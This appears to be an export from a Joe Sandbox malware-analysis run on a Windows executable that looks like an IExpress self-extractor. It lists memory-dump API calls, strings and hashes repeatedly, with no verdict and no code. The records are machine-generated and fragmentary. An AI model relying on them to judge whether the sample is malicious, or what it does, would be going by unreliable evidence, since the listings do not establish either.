• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
• String ID: $<None>$UPROMPT
• API String ID: 957408736-2569542085
• Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
• Instruction ID: 9035c5d1042de8d18701ed8f7577a86e1d98560b63b7383bafed24c2f7606c28
• Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
• Instruction Fuzzy Hash: B7317071E2838287E7216B20ED5077BFA51FB85F84F884136CA8E0A6D2DF7DD4048B12

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: CreateFile$lstrcmp
• String ID: *MEMCAB
• API String ID: 1301100335-3211172518
• Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
• Instruction ID: 94050c8daedb2e5b274a3c07dcfe3c420e1c8c44b5f8c2cf25102abcf29f2721
• Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
• Instruction Fuzzy Hash: AC61BA629287C186F7A09B14AD84376BA91F745F74F885336CAAE0B7D1CF7CE4058722

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: FileTime$AttributesDateLocalTextWindow
• String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
• API String ID: 1150793416-1955631000
• Opcode ID: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
• Instruction ID: a49b5264b18684f559bb215e3a33d398b5cec8ec7035cc85701bed28599bed94
• Opcode Fuzzy Hash: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
• Instruction Fuzzy Hash: 7D518321A38AC285EA90AB15DC403BBA790FB48F50FCC5133D98E4B2D6CE3CE545C361

APIs
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Window$CapsDeviceRect$Release
• String ID:
• API String ID: 2212493051-0
• Opcode ID: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
• Instruction ID: fb5ab862797e0f36d4e57c8b1e5c5e5c7dade5106efbc3d59d7426d25bbbeb91
• Opcode Fuzzy Hash: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
• Instruction Fuzzy Hash: 4C318232B246418AE7109B75E8046BEBBB1F789F99F995131CE4A57B84CF3CE445CB10
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocLocal
                                                                                                        • String ID: TMP4351$.TMP
                                                                                                        • API String ID: 3494564517-2619824408
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7E6E83B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF7E6E83A09), ref: 00007FF7E6E83B64
                                                                                                          • Part of subcall function 00007FF7E6E83B40: PeekMessageA.USER32 ref: 00007FF7E6E83B89
                                                                                                          • Part of subcall function 00007FF7E6E83B40: PeekMessageA.USER32 ref: 00007FF7E6E83BCD
                                                                                                        • WriteFile.KERNELBASE ref: 00007FF7E6E856E4
                                                                                                        Similarity
                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1084409-0
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                        • String ID:
                                                                                                        • API String ID: 2018477427-0
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: CharPrev
                                                                                                        • String ID:
                                                                                                        • API String ID: 122130370-0
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                        • String ID: $Adv$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                        • API String ID: 3530494346-2156566418
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2168512254-0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                        • API String ID: 2829607268-3733053543
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 4104442557-0
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                        • String ID: "$:$@$RegServer
                                                                                                        • API String ID: 1203814774-4077547207
APIs
• LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84A86
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84AAA
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84ACA
• GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84AEC
• GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84B1B
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84B3A
• CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84B54
• FreeLibrary.KERNEL32 ref: 00007FF7E6E84BF1
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E6E835E3), ref: 00007FF7E6E84C0D
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
• Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
• Instruction ID: 2f869ebdcfccfcafcebab5d10e76c8ac9772e28761a5454763b8bc4e3f7fb685
• Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
• Instruction Fuzzy Hash: B4514025A29BC286E601AB15BC5427BBA90FB46F91FC84176DD8E0B7D4DF3CD448C711
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
• String ID: Adv$rce.
• API String ID: 2929476258-1496161719
• Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
• Instruction ID: 44c210a6fce8d9da7ff7bc5e6dd288d1dd49a9d7becf0b87d0c07d93e0cb945f
• Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
• Instruction Fuzzy Hash: 5361B521E287C586FB11AB25AC003BAEA90FB59F54F885236DE8D0B7D1DF3CE5458721
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
• Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
• Instruction ID: d8cb47bec5a35a1020772b4fa2611bf4d7644a0460130fbb64604a4b54631e2d
• Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
• Instruction Fuzzy Hash: 095182726286C186EA109B15EC443BBBBA0FB89F90F985032DA8E0B7D4DF3DD845C711
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
• String ID: Adv
• API String ID: 3785188418-921584719
• Opcode ID: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
• Instruction ID: 67542f3fa90126c40bd2ee6dde17308dcc61a848c0fb50e71aa3b0d808790ffc
• Opcode Fuzzy Hash: 5437c451f9b0f03a7d5304c51dea48bd08e1932c988bfe6d4e908a474b1ba20e
• Instruction Fuzzy Hash: 9C314670D247C28AE6106B64AC04376EB51FB9AF61FCC9232C99E0A3D4DF3DA445C722
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
• String ID: Control Panel\Desktop\ResourceLocale
• API String ID: 3346862599-1109908249
• Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
• Instruction ID: 785f7b615460204e3b8b8cc5774549bd755fe9b747ae686dceec558bece4525f
• Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
• Instruction Fuzzy Hash: 52514E32E29A818AE7109B24DC4027BB7A5FB89F64F894132DA9D077D4DF3CE544CB52
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: FreeLibrary$AddressAllocateInitializeLoadProc
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 4204503880-1888249752
• Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
• Instruction ID: 8ab35ba5158882d6123d333f430ecd8219c067d6859b2b0dbea515892f7e07ee
• Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
• Instruction Fuzzy Hash: 9C314436918B858AD7109F15F8442AAFBA0FB89F50F895136DE8E47754DF3CE005CB50
APIs
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
• String ID:
• API String ID: 1051330783-0
• Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
• Instruction ID: 67f8143177d72727b6932f9ff52a12529c8f235b64bcbd6b75176a6b94443a65
• Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
• Instruction Fuzzy Hash: AA514532A146C28EEA109F159C007BAB7A4FB48F94F989132DE4D6B7D4DF39E841C761
APIs
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
• String ID:
• API String ID: 975904313-0
• Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
• Instruction ID: dd0bf3fe57a64bba49ff4294fc6b06231aacdd911e2e1cb76dadfe48b4a24672
• Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
• Instruction Fuzzy Hash: 24518861A296C549FB216F259C043BAEB91BB49F91F8C4172CACE0F7C5CE3CD8458761
APIs
  • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85078
  • Part of subcall function 00007FF7E6E85050: SizeofResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85089
  • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850AF
  • Part of subcall function 00007FF7E6E85050: LoadResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850C0
  • Part of subcall function 00007FF7E6E85050: LockResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850CF
  • Part of subcall function 00007FF7E6E85050: memcpy_s.MSVCRT ref: 00007FF7E6E850EE
  • Part of subcall function 00007FF7E6E85050: FreeResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850FD
• LocalAlloc.KERNEL32(?,?,?,?,?,00007FF7E6E83139), ref: 00007FF7E6E83F95
• LocalFree.KERNEL32 ref: 00007FF7E6E84018
  • Part of subcall function 00007FF7E6E84DCC: LoadStringA.USER32 ref: 00007FF7E6E84E60
  • Part of subcall function 00007FF7E6E84DCC: MessageBoxA.USER32 ref: 00007FF7E6E84EA0
  • Part of subcall function 00007FF7E6E87700: GetLastError.KERNEL32 ref: 00007FF7E6E87704
• lstrcmpA.KERNEL32(?,?,?,?,?,00007FF7E6E83139), ref: 00007FF7E6E8403E
• LocalFree.KERNEL32(?,?,?,?,?,00007FF7E6E83139), ref: 00007FF7E6E8409F
  • Part of subcall function 00007FF7E6E87AC8: FindResourceA.KERNEL32 ref: 00007FF7E6E87AF2
  • Part of subcall function 00007FF7E6E87AC8: LoadResource.KERNEL32 ref: 00007FF7E6E87B09
  • Part of subcall function 00007FF7E6E87AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF7E6E87B3F
  • Part of subcall function 00007FF7E6E87AC8: FreeResource.KERNEL32 ref: 00007FF7E6E87B51
• LocalFree.KERNEL32 ref: 00007FF7E6E84078
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
• String ID: <None>$LICENSE
• API String ID: 2414642746-383193767
• Opcode ID: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
• Instruction ID: 1a810980676f452584e6e615e814173fb8989ec3022e8e41316d60685ce93524
• Opcode Fuzzy Hash: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
• Instruction Fuzzy Hash: 40314D71A3878286E710AB60EC1577BB6A1FB94B45FD84136D58E0E6D0EF7DA0048622
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7E6E8114C: _vsnprintf.MSVCRT ref: 00007FF7E6E81189
                                                                                                        • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E6E8606F), ref: 00007FF7E6E87763
                                                                                                        • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E6E8606F), ref: 00007FF7E6E87772
                                                                                                        • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E6E8606F), ref: 00007FF7E6E877B8
                                                                                                        • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E6E8606F), ref: 00007FF7E6E877EC
                                                                                                        • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E6E8606F), ref: 00007FF7E6E87805
                                                                                                        Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Resource$Free$FindLoadLock_vsnprintf
• String ID: UPDFILE%lu
• API String ID: 2922116661-2329316264
• Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
• Instruction ID: a5082b63688c033300ce2b55d7a2384fc418f26455a3f78dd23b109c2b0c1e61
• Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
• Instruction Fuzzy Hash: 85317731A187C1C6EB10AB15A80127AFB91FB89F50F998536DA9E0B7D4CF3CD445C711
APIs
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
• String ID:
• API String ID: 3370778649-0
• Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
• Instruction ID: 912f0c9019f3b33f11a0646be938920ef32431b3e95c103b6e421e1635f3f8e2
• Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
• Instruction Fuzzy Hash: D3116A21B18B8187EB446F66B80427AFAA0FB4EFC0B889039DD8E4B795DF3CD4448611
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
• String ID: wininit.ini
• API String ID: 3273605193-4206010578
• Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
• Instruction ID: 7faf09f53a9ff1c072a5a9567fc21c96811ee855e6d1672d22708ab79e03067f
• Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
• Instruction Fuzzy Hash: 2D113332A14A8187D710AB25EC543AAB7A1FBCDB14FC98132DA8E47694DF3CD509C610
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Window$Text$DesktopDialogForegroundItem
• String ID: Adv
• API String ID: 761066910-921584719
• Opcode ID: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
• Instruction ID: 77057a87b52ba5b8e3ae53fbf68f827b2b21afc9d43f464064f66789caf498f5
• Opcode Fuzzy Hash: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
• Instruction Fuzzy Hash: 9D111F64D287C286F6543B95EC0837AEA51FB5AF41FCC9132C88E5A7D4DE3CA4448622
APIs
